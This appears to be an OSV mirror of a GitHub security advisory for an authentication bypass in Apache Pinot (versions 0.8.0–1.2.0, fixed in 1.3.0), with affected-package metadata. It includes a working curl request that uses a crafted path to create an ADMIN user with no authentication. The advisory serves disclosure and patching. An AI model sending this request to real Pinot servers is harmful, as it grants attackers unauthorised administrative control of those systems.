GHSA-6jwp-4wvj-6597

Suggest an improvement
Source
https://github.com/advisories/GHSA-6jwp-4wvj-6597
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-6jwp-4wvj-6597
Aliases
Published
2025-04-01T09:30:20Z
Modified
2026-08-31T23:00:09Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
  • 9.3 (Critical) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
Apache Pinot Vulnerable to Authentication Bypass
Details

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"} http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example

curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

Database specific
{
    "cwe_ids": [
        "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-01T18:20:48Z",
    "nvd_published_at": "2025-04-01T09:15:15Z",
    "severity": "CRITICAL"
}
References

Affected packages

Maven / org.apache.pinot:pinot-broker

Package

Name
org.apache.pinot:pinot-broker
View open source insights on deps.dev
Purl
pkg:maven/org.apache.pinot/pinot-broker

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.8.0
Fixed
1.3.0

Affected versions

0.*
0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.10.0
0.11.0
0.12.0
0.12.1
1.*
1.0.0
1.1.0
1.2.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json"

Maven / org.apache.pinot:pinot-common

Package

Name
org.apache.pinot:pinot-common
View open source insights on deps.dev
Purl
pkg:maven/org.apache.pinot/pinot-common

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.8.0
Fixed
1.3.0

Affected versions

0.*
0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.10.0
0.11.0
0.12.0
0.12.1
1.*
1.0.0
1.1.0
1.2.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json"

Maven / org.apache.pinot:pinot-controller

Package

Name
org.apache.pinot:pinot-controller
View open source insights on deps.dev
Purl
pkg:maven/org.apache.pinot/pinot-controller

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.8.0
Fixed
1.3.0

Affected versions

0.*
0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.10.0
0.11.0
0.12.0
0.12.1
1.*
1.0.0
1.1.0
1.2.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-6jwp-4wvj-6597/GHSA-6jwp-4wvj-6597.json"